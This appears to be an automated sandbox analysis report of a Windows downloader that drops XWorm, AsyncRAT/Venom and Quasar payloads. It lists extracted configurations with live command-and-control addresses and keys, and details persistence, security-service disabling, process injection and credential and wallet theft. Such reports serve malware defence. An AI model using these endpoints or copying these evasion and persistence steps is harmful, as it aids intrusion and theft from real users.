Resubmissions
18-09-2024 16:12
240918-tnhy5a1cmp 1016-08-2024 04:34
240816-e7ba3azckk 1016-08-2024 04:25
240816-e14zssyhpq 1016-08-2024 04:25
240816-e1x69ayhpk 315-08-2024 21:56
240815-1tbkka1fpq 1015-08-2024 21:47
240815-1nkw2swfre 1015-08-2024 21:46
240815-1m318s1cpr 315-08-2024 21:46
240815-1mkvnawflb 1013-08-2024 22:28
240813-2dvtyazbph 1025-06-2024 11:24
240625-nhwp5swhja 10Analysis
-
max time kernel
133s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 09:14
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
New Text Document mod.exe
Resource
win10v2004-20240426-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
xworm
5.0
85.203.4.146:7000
eItTbYBfBYihwkyW
-
Install_directory
%Userprofile%
-
install_file
svchost.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.2
Default
85.209.133.18:4545
tdipywykihsjieff
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Office04
79.132.193.215:4782
f99ccef5-65c4-4972-adf2-fb38921cc9fc
-
encryption_key
1C15E91ACCFAC60B043A1336CF6912EA8572BA83
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\svchost.exe family_xworm behavioral4/memory/4600-6397-0x0000000000FD0000-0x0000000000FE0000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
Processes:
sysblardsv.exesyslmgrsvc.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" syslmgrsvc.exe -
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\client.exe family_quasar behavioral4/memory/1312-15683-0x0000000000730000-0x0000000000A54000-memory.dmp family_quasar -
Processes:
sysblardsv.exesyslmgrsvc.exewinqlsdrvcs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysblardsv.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\win1.exe family_asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 159 4968 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3316 powershell.exe 4968 powershell.exe 5412 powershell.exe 4908 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
print.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts print.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
222.exePirate_24S.exeWScript.exeNew Text Document mod.exeoutput.execonhost.exeinte.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation 222.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Pirate_24S.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation output.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation conhost.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation inte.exe -
Drops startup file 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe -
Executes dropped EXE 61 IoCs
Processes:
xin.exeeagleget-2-1-6-50.exeAntiVirus2.exeSetup.exesvchost.exewin1.exeoutput.exeSIG.EXEalabi.execrt.execrt.tmpoiii.exesoundermidiplayer.exesoundermidiplayer.execonhost.exesdf34ert3etgrthrthfghfghjfgh.exekat9313.tmp7z.exe7z.exe7z.exesvcshost.exeo2i3jroi23joj23ikrjokij3oroi.exeinte.exevpn-1002.exekat9AB4.tmptdrpload.exeprint.exesysblardsv.exe222.exePirate_24S.exe7z.exe7z.exe7z.exeupdater.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeInstaller.execlient.exeClient.exereverse.exe64.exe259516163.exesyslmgrsvc.exe336738194.exewinqlsdrvcs.exeadwmbjfsmbak.exe2322128858.exe2930632633.exe3759823002.exeWindows Security Upgrade Service.exe1345921245.exe2203324155.exe1957614520.exe624913175.exe2028115777.exe1194417734.exeWindows Security Upgrade Service.exepid process 4392 xin.exe 3576 eagleget-2-1-6-50.exe 3268 AntiVirus2.exe 5860 Setup.exe 4600 svchost.exe 2680 win1.exe 2184 output.exe 4984 SIG.EXE 5992 alabi.exe 4700 crt.exe 5376 crt.tmp 7312 oiii.exe 7092 soundermidiplayer.exe 6300 soundermidiplayer.exe 4764 conhost.exe 8000 sdf34ert3etgrthrthfghfghjfgh.exe 1540 kat9313.tmp 5956 7z.exe 5636 7z.exe 6468 7z.exe 2080 svcshost.exe 6364 o2i3jroi23joj23ikrjokij3oroi.exe 6252 inte.exe 5384 vpn-1002.exe 5568 kat9AB4.tmp 2344 tdrpload.exe 1368 print.exe 7760 sysblardsv.exe 5708 222.exe 7272 Pirate_24S.exe 7636 7z.exe 5060 7z.exe 7316 7z.exe 6084 updater.exe 5848 7z.exe 6980 7z.exe 5704 7z.exe 7480 7z.exe 60 7z.exe 2776 7z.exe 7796 Installer.exe 1312 client.exe 824 Client.exe 5956 reverse.exe 8076 64.exe 5608 259516163.exe 3016 syslmgrsvc.exe 6868 336738194.exe 8160 winqlsdrvcs.exe 7000 adwmbjfsmbak.exe 6080 2322128858.exe 1116 2930632633.exe 6472 3759823002.exe 6876 Windows Security Upgrade Service.exe 1064 1345921245.exe 5560 2203324155.exe 3976 1957614520.exe 4608 624913175.exe 7420 2028115777.exe 6308 1194417734.exe 6336 Windows Security Upgrade Service.exe -
Loads dropped DLL 18 IoCs
Processes:
xin.execrt.tmpFUT.au37z.exe7z.exe7z.exevpn-1002.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepid process 4392 xin.exe 5376 crt.tmp 5376 crt.tmp 5376 crt.tmp 4892 FUT.au3 5956 7z.exe 5636 7z.exe 6468 7z.exe 5384 vpn-1002.exe 7636 7z.exe 5060 7z.exe 7316 7z.exe 5848 7z.exe 6980 7z.exe 5704 7z.exe 7480 7z.exe 60 7z.exe 2776 7z.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
sysblardsv.exesyslmgrsvc.exewinqlsdrvcs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winqlsdrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysblardsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" syslmgrsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winqlsdrvcs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
259516163.exe336738194.exeSIG.EXEtdrpload.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syslmgrsvc.exe" 259516163.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winqlsdrvcs.exe" 336738194.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmokeUnity = "C:\\Users\\Admin\\Documents\\Mochacha\\NaturalValue.exe" SIG.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysblardsv.exe" tdrpload.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 39 raw.githubusercontent.com 40 raw.githubusercontent.com 154 pastebin.com 155 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 62 ip-api.com -
Drops file in System32 directory 6 IoCs
Processes:
client.exeInstaller.exepowershell.exeadwmbjfsmbak.exedescription ioc process File created C:\Windows\system32\Client.exe client.exe File opened for modification C:\Windows\system32\Client.exe client.exe File opened for modification C:\Windows\system32\MRT.exe Installer.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe adwmbjfsmbak.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
xin.exeSetup.exeSIG.EXEsdf34ert3etgrthrthfghfghjfgh.exeo2i3jroi23joj23ikrjokij3oroi.exeupdater.exeadwmbjfsmbak.exedescription pid process target process PID 4392 set thread context of 1584 4392 xin.exe MsBuild.exe PID 5860 set thread context of 3080 5860 Setup.exe comp.exe PID 4984 set thread context of 4524 4984 SIG.EXE csc.exe PID 8000 set thread context of 1540 8000 sdf34ert3etgrthrthfghfghjfgh.exe kat9313.tmp PID 6364 set thread context of 5568 6364 o2i3jroi23joj23ikrjokij3oroi.exe kat9AB4.tmp PID 6084 set thread context of 4300 6084 updater.exe conhost.exe PID 6084 set thread context of 2524 6084 updater.exe conhost.exe PID 7000 set thread context of 2696 7000 adwmbjfsmbak.exe conhost.exe PID 7000 set thread context of 3316 7000 adwmbjfsmbak.exe explorer.exe -
Drops file in Program Files directory 2 IoCs
Processes:
oiii.exedescription ioc process File created C:\Program Files\Windows Media Player\background.jpg oiii.exe File created C:\Program Files\Windows Media Player\mpsvc.dll oiii.exe -
Drops file in Windows directory 6 IoCs
Processes:
336738194.exetdrpload.exe259516163.exedescription ioc process File created C:\Windows\winqlsdrvcs.exe 336738194.exe File opened for modification C:\Windows\winqlsdrvcs.exe 336738194.exe File created C:\Windows\sysblardsv.exe tdrpload.exe File opened for modification C:\Windows\sysblardsv.exe tdrpload.exe File created C:\Windows\syslmgrsvc.exe 259516163.exe File opened for modification C:\Windows\syslmgrsvc.exe 259516163.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 7396 sc.exe 5036 sc.exe 6808 sc.exe 5148 sc.exe 7268 sc.exe 5252 sc.exe 3144 sc.exe 7840 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exeFUT.au3description ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FUT.au3 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 912 schtasks.exe 6896 schtasks.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 7084 taskkill.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe -
Modifies registry class 2 IoCs
Processes:
output.exePirate_24S.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings output.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings Pirate_24S.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
MsBuild.exeSetup.exewin1.exeoutput.execomp.exeAcroRd32.exeFUT.au3svcshost.exepowershell.exepowershell.exeprint.exeupdater.exepid process 1584 MsBuild.exe 1584 MsBuild.exe 5860 Setup.exe 5860 Setup.exe 5860 Setup.exe 2680 win1.exe 2680 win1.exe 2680 win1.exe 2680 win1.exe 2680 win1.exe 2184 output.exe 2184 output.exe 3080 comp.exe 3080 comp.exe 3080 comp.exe 3080 comp.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 4892 FUT.au3 4892 FUT.au3 2080 svcshost.exe 2080 svcshost.exe 3316 powershell.exe 3316 powershell.exe 3316 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 2080 svcshost.exe 2080 svcshost.exe 2080 svcshost.exe 2080 svcshost.exe 1368 print.exe 1368 print.exe 1368 print.exe 1368 print.exe 1368 print.exe 1368 print.exe 1368 print.exe 1368 print.exe 6084 updater.exe 6084 updater.exe 6084 updater.exe 6084 updater.exe 6084 updater.exe 6084 updater.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
Setup.execomp.exepid process 5860 Setup.exe 3080 comp.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
syslmgrsvc.exepid process 3016 syslmgrsvc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
New Text Document mod.exeMsBuild.exeAntiVirus2.exesvchost.exewin1.exealabi.execsc.exe7z.exe7z.exe7z.exesvcshost.exepowershell.exepowershell.exetaskkill.exe7z.exe7z.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe7z.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe7z.exe7z.exedescription pid process Token: SeDebugPrivilege 4860 New Text Document mod.exe Token: SeDebugPrivilege 1584 MsBuild.exe Token: SeBackupPrivilege 1584 MsBuild.exe Token: SeSecurityPrivilege 1584 MsBuild.exe Token: SeSecurityPrivilege 1584 MsBuild.exe Token: SeSecurityPrivilege 1584 MsBuild.exe Token: SeSecurityPrivilege 1584 MsBuild.exe Token: SeDebugPrivilege 3268 AntiVirus2.exe Token: SeDebugPrivilege 4600 svchost.exe Token: SeDebugPrivilege 2680 win1.exe Token: SeDebugPrivilege 4600 svchost.exe Token: SeDebugPrivilege 5992 alabi.exe Token: SeDebugPrivilege 4524 csc.exe Token: SeRestorePrivilege 5956 7z.exe Token: 35 5956 7z.exe Token: SeSecurityPrivilege 5956 7z.exe Token: SeSecurityPrivilege 5956 7z.exe Token: SeRestorePrivilege 5636 7z.exe Token: 35 5636 7z.exe Token: SeSecurityPrivilege 5636 7z.exe Token: SeSecurityPrivilege 5636 7z.exe Token: SeRestorePrivilege 6468 7z.exe Token: 35 6468 7z.exe Token: SeSecurityPrivilege 6468 7z.exe Token: SeSecurityPrivilege 6468 7z.exe Token: SeDebugPrivilege 2080 svcshost.exe Token: SeDebugPrivilege 3316 powershell.exe Token: SeDebugPrivilege 4968 powershell.exe Token: SeDebugPrivilege 7084 taskkill.exe Token: SeRestorePrivilege 7636 7z.exe Token: 35 7636 7z.exe Token: SeSecurityPrivilege 7636 7z.exe Token: SeSecurityPrivilege 7636 7z.exe Token: SeRestorePrivilege 5060 7z.exe Token: 35 5060 7z.exe Token: SeSecurityPrivilege 5060 7z.exe Token: SeSecurityPrivilege 5060 7z.exe Token: SeShutdownPrivilege 5472 powercfg.exe Token: SeCreatePagefilePrivilege 5472 powercfg.exe Token: SeShutdownPrivilege 1352 powercfg.exe Token: SeCreatePagefilePrivilege 1352 powercfg.exe Token: SeShutdownPrivilege 1456 powercfg.exe Token: SeCreatePagefilePrivilege 1456 powercfg.exe Token: SeShutdownPrivilege 7172 powercfg.exe Token: SeCreatePagefilePrivilege 7172 powercfg.exe Token: SeRestorePrivilege 7316 7z.exe Token: 35 7316 7z.exe Token: SeSecurityPrivilege 7316 7z.exe Token: SeLockMemoryPrivilege 2524 conhost.exe Token: SeSecurityPrivilege 7316 7z.exe Token: SeShutdownPrivilege 928 powercfg.exe Token: SeCreatePagefilePrivilege 928 powercfg.exe Token: SeShutdownPrivilege 6428 powercfg.exe Token: SeCreatePagefilePrivilege 6428 powercfg.exe Token: SeShutdownPrivilege 1020 powercfg.exe Token: SeCreatePagefilePrivilege 1020 powercfg.exe Token: SeShutdownPrivilege 7564 powercfg.exe Token: SeCreatePagefilePrivilege 7564 powercfg.exe Token: SeRestorePrivilege 5848 7z.exe Token: 35 5848 7z.exe Token: SeSecurityPrivilege 5848 7z.exe Token: SeSecurityPrivilege 5848 7z.exe Token: SeRestorePrivilege 6980 7z.exe Token: 35 6980 7z.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
AcroRd32.execrt.tmpClient.exepid process 5288 AcroRd32.exe 5376 crt.tmp 824 Client.exe -
